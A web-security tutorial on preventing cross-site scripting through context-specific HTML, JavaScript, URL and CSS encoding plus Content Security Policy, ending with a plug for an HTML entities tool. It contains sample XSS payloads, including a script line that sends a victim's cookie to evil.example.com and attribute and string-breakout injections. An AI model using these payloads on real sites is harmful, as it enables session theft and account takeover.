XSS and HTML Encoding: The Five Contexts That Require Different Escaping
XSS is still the most common web vulnerability, and unescaped HTML is the mechanism. Here's how cross-site scripting actually works, the five encoding contexts that require different treatment, why React is safe by default but PHP isn't, and how CSP adds a second layer.
By sadiqbd · June 9, 2026
Cross-site scripting is still the most common web vulnerability, and unescaped HTML is the mechanism
Cross-site scripting (XSS) has appeared in the OWASP Top 10 list of web vulnerabilities for over two decades. In the 2021 edition it was folded into the Injection category, which ranked third. The attack is conceptually simple: inject malicious HTML or JavaScript into a page that other users view. It persists because every place user input is reflected in a web page is a potential injection point, and there are always more injection points than developers remember.
HTML entity encoding is one of the core defences. Understanding it, and understanding when it's not sufficient, is foundational to web security.
How XSS works
The basic stored XSS attack:
- An attacker submits content to a website: `<script>document.location='https://evil.example.com/steal?cookie='+document.cookie;</script>`
- The website stores this content in a database (a comment, a username, a product description)
- When another user views the page, the server renders the stored content into the HTML
- The browser executes the `<script>` tag as JavaScript
- The attacker receives the victim's session cookie and can impersonate them
The defence: never render user-controlled content as raw HTML. HTML-encode it first so that `<script>` becomes `&lt;script&gt;`, which is displayed as literal text, not executed as code.
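As a minimal sketch of that defence in Python, the standard library's `html.escape` can be applied at the moment the stored comment is rendered. The `render_comment` helper and the surrounding `<p>` markup are illustrative assumptions, not part of any particular framework.

```python
import html


def render_comment(stored_comment: str) -> str:
    """Render a stored comment as text inside a paragraph (hypothetical helper)."""
    # Escape at output time so the stored value is displayed, never parsed as markup.
    return f"<p>{html.escape(stored_comment)}</p>"


payload = (
    "<script>document.location="
    "'https://evil.example.com/steal?cookie='+document.cookie;</script>"
)
print(render_comment(payload))
```

The stored value stays unchanged in the database; only the rendered output is encoded.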
HTML entities: the complete encoding map
HTML special characters that must be encoded:
| Character | Entity name | Entity number | Role in HTML |
|---|---|---|---|
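| `<` | `&lt;` | `&#60;` | Opens tags |
| `>` | `&gt;` | `&#62;` | Closes tags |
| `&` | `&amp;` | `&#38;` | Begins entities |
| `"` | `&quot;` | `&#34;` | Delimits attribute values |
| `'` | `&apos;` | `&#39;` | Delimits attribute values (HTML5) |
| `/` | (none listed) | `&#47;` | Can close tags |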
The minimum for HTML body context: encode <, >, and &.
For HTML attribute values: also encode " and ' (whichever delimits the attribute).
The most critical: `&` must always be encoded first, before encoding the others. Otherwise `<` → `&lt;`, and then the `&` in `&lt;` gets encoded again → `&amp;lt;` (double encoding).
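The ordering rule is easy to see in a hand-rolled encoder. The sketch below is for illustration only; both function names are made up here, and in practice a library routine such as Python's `html.escape` already handles the order correctly.

```python
def escape_html(text: str) -> str:
    """Encode & first, then the remaining special characters (illustrative helper)."""
    return (
        text.replace("&", "&amp;")
        .replace("<", "&lt;")
        .replace(">", "&gt;")
        .replace('"', "&quot;")
        .replace("'", "&#39;")
    )


def escape_html_wrong_order(text: str) -> str:
    """Deliberately broken: encodes & last, so earlier entities are re-encoded."""
    return text.replace("<", "&lt;").replace(">", "&gt;").replace("&", "&amp;")


print(escape_html("<b>"))              # &lt;b&gt;
print(escape_html_wrong_order("<b>"))  # &amp;lt;b&amp;gt;
```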
The five encoding contexts
Different contexts in HTML require different encoding, and this is where many XSS defences fail. Encoding correctly for one context doesn't protect another.
Context 1: HTML body
User content rendered between HTML tags:
<p>User input here: ENCODE FOR HTML</p>
Encode: `<` → `&lt;`, `>` → `&gt;`, `&` → `&amp;`
Context 2: HTML attribute (double-quoted)
<input value="ENCODE FOR ATTRIBUTE">
Encode the same characters as in the HTML body, plus `"` → `&quot;`.
An attacker could inject `" onmouseover="alert(1)`, which becomes a second attribute executing JavaScript. Encoding the quote character prevents the attribute from being closed early.
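A short Python sketch of the attribute case, using the standard library's `html.escape` with `quote=True` so that both quote characters are encoded. The `render_input` helper is a hypothetical name used only for this example.

```python
import html


def render_input(value: str) -> str:
    """Place a user-controlled value inside a double-quoted attribute (hypothetical helper)."""
    # quote=True (the default) also encodes " as &quot; and ' as &#x27;
    return f'<input value="{html.escape(value, quote=True)}">'


payload = '" onmouseover="alert(1)'
print(render_input(payload))
# <input value="&quot; onmouseover=&quot;alert(1)">
```

Because the injected quotes are encoded, the payload stays inside the `value` attribute instead of starting a new one. This only holds when the attribute is quoted in the template.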
Context 3: JavaScript string
<script>
var username = "ENCODE FOR JAVASCRIPT";
</script>
HTML encoding is NOT sufficient here. JavaScript strings require JavaScript encoding: `\` → `\\`, `"` → `\"`, `'` → `\'`, newlines → `\n`. Many frameworks have separate functions for this context.
An attacker could inject `"; alert(1); //`, closing the string, executing a new statement, and commenting out the remainder.
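One way to sketch this in Python is to let `json.dumps` produce the quoted string literal, then additionally escape `<`, `>`, and `&` as `\uXXXX` sequences so that a value containing `</script>` cannot end the script block early. The `js_string_literal` helper is an assumption made for this example, not a standard function.

```python
import json


def js_string_literal(value: str) -> str:
    """Return a double-quoted JavaScript string literal for embedding in a <script> block.

    Hypothetical helper: json.dumps handles backslashes, quotes, and newlines;
    the extra replacements keep the HTML parser from seeing tag-like text.
    """
    literal = json.dumps(value)  # ensure_ascii=True also escapes U+2028 and U+2029
    return (
        literal.replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


payload = '"; alert(1); //'
print(f"var username = {js_string_literal(payload)};")
# var username = "\"; alert(1); //";
```

The returned literal already includes its own surrounding quotes, so the template should not add another pair.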
Context 4: URL context
<a href="https://example.com/search?q=ENCODE FOR URL">
URLs require percent-encoding for user-controlled values: space → `%20`, `<` → `%3C`, `>` → `%3E`. Using HTML entities in a URL context doesn't prevent injection.
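A minimal Python sketch of the URL case, using `urllib.parse.quote` for the query value and then `html.escape` for the attribute that holds the finished URL. The `search_link` helper and the link text are assumptions for illustration; the base URL is the one from the example above.

```python
import html
from urllib.parse import quote


def search_link(query: str) -> str:
    """Build a search link with a user-controlled query value (hypothetical helper)."""
    # safe="" percent-encodes every reserved character, including / and ?
    url = "https://example.com/search?q=" + quote(query, safe="")
    # The finished URL sits inside an HTML attribute, so it is attribute-encoded too.
    return f'<a href="{html.escape(url, quote=True)}">Search</a>'


print(search_link("a b<c>"))
# <a href="https://example.com/search?q=a%20b%3Cc%3E">Search</a>
```

Two encodings are applied because two contexts are nested: the value is inside a URL, and the URL is inside an attribute.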
Context 5: CSS context
<div style="background-color: USER_INPUT">
CSS values can contain expression() and other mechanisms that execute JavaScript in older browsers. User input should never be placed in CSS values without strict validation and encoding.
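Strict validation for a CSS value usually means an allowlist rather than escaping. The Python sketch below accepts only hex colours and a small set of named colours; the helper name, the list of names, and the `transparent` fallback are all assumptions chosen for this example.

```python
import re

# Allowlist: 3- or 6-digit hex colours, plus a few named colours (illustrative set).
_HEX_COLOR = re.compile(r"#[0-9a-fA-F]{3}(?:[0-9a-fA-F]{3})?")
_NAMED_COLORS = frozenset({"red", "green", "blue", "black", "white"})


def safe_background_color(value: str, default: str = "transparent") -> str:
    """Return the value only if it matches the allowlist, else a fixed default."""
    candidate = value.strip()
    if _HEX_COLOR.fullmatch(candidate) or candidate.lower() in _NAMED_COLORS:
        return candidate
    return default


print(safe_background_color("#ff0000"))               # #ff0000
print(safe_background_color("expression(alert(1))"))  # transparent
```

Anything outside the allowlist is replaced rather than repaired, so unexpected syntax never reaches the `style` attribute.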
Why HTML encoding alone isn't enough: CSP
HTML encoding prevents injection when applied correctly to every context. But correctly applying context-appropriate encoding to every reflection point in a complex application is difficult, and any missed location is a vulnerability.
Content Security Policy (CSP) provides a second layer: it tells the browser which sources of scripts, styles, and other resources are legitimate. A strict CSP rejects inline scripts entirely:
Content-Security-Policy: default-src 'self'; script-src 'nonce-{random}' 'strict-dynamic'; object-src 'none';
With a nonce-based CSP, `<script>` tags without the correct nonce don't execute, even if an attacker successfully injects them. This makes many XSS attacks ineffective even when encoding is missed.
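A rough Python sketch of how a server might generate the nonce and build the header shown above. The helper names and the `/static/app.js` path are assumptions; the key points are that the nonce comes from a cryptographically secure source and is regenerated for every response.

```python
import base64
import secrets


def new_nonce() -> str:
    """Return a fresh, unpredictable nonce; generate a new one per response."""
    return base64.b64encode(secrets.token_bytes(16)).decode("ascii")


def build_csp_header(nonce: str) -> str:
    """Build the Content-Security-Policy value for a single response."""
    return (
        "default-src 'self'; "
        f"script-src 'nonce-{nonce}' 'strict-dynamic'; "
        "object-src 'none';"
    )


nonce = new_nonce()
headers = {"Content-Security-Policy": build_csp_header(nonce)}
# Only script tags carrying the same nonce are allowed to run.
page = f'<script nonce="{nonce}" src="/static/app.js"></script>'
```

An injected `<script>` tag cannot know the nonce for the current response, so the browser refuses to run it.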
Common framework encoding behaviours
React: JSX automatically escapes all user-controlled values rendered as text. `{userInput}` is HTML-encoded. The exception: `dangerouslySetInnerHTML` bypasses encoding entirely, and its name is deliberate.
Django templates: auto-escaping is enabled by default. `{{ user_input }}` is HTML-encoded. The `|safe` filter disables encoding, so only use it for content you've verified is safe.
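Jinja2: auto-escaping is disabled by default when Jinja2 is used on its own; Flask turns it on for templates with HTML-like extensions such as `.html` and `.xml`. Enable it explicitly with `autoescape=True` (or `select_autoescape()`) for HTML templates.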
PHP echo: no escaping. Always use htmlspecialchars($input, ENT_QUOTES, 'UTF-8') before outputting user input.
How to use the HTML Entities tool on sadiqbd.com
Encoding:
- Paste text containing special characters
- Encode → `<script>alert(1)</script>` becomes `&lt;script&gt;alert(1)&lt;/script&gt;`
- Use the encoded output for safe HTML display
Decoding:
- Paste HTML-encoded text
- Decode → `&amp;lt;` becomes `&lt;` (or further decode to `<`)
- Use for reading encoded content in HTML source
Frequently Asked Questions
Why do I see both `&lt;` and `&#60;` for the same character?
Both represent the same character (`<`): one uses a named entity reference, the other uses a numeric character reference (decimal). All modern browsers handle both identically. Named entities are more readable; numeric references work for characters without named equivalents.
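The equivalence can be checked with Python's `html.unescape`, which decodes named, decimal, and hexadecimal references alike. This is only a quick demonstration; the variable names are arbitrary.

```python
import html

named = html.unescape("&lt;")       # named entity reference
decimal = html.unescape("&#60;")    # decimal numeric reference
hexadecimal = html.unescape("&#x3C;")  # hexadecimal numeric reference
print(named == decimal == hexadecimal == "<")  # True

# Double-encoded text needs two decoding passes to get back to the character.
once = html.unescape("&amp;lt;")
twice = html.unescape(once)
```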
Is URL encoding the same as HTML encoding?
No, they're different encoding systems for different contexts. `<` is `&lt;` in HTML encoding and `%3C` in URL percent-encoding. Using the wrong encoding for a context doesn't prevent injection.
Is the HTML Entities tool free?
Yes, completely free, no sign-up required.
HTML entity encoding is one layer of XSS defence. Applied correctly to every rendering context, it prevents the direct injection mechanism. Combined with CSP, it provides defence in depth against one of the web's most persistent vulnerability classes.
Try the HTML Entities tool free at sadiqbd.com: encode or decode HTML entities for any text instantly.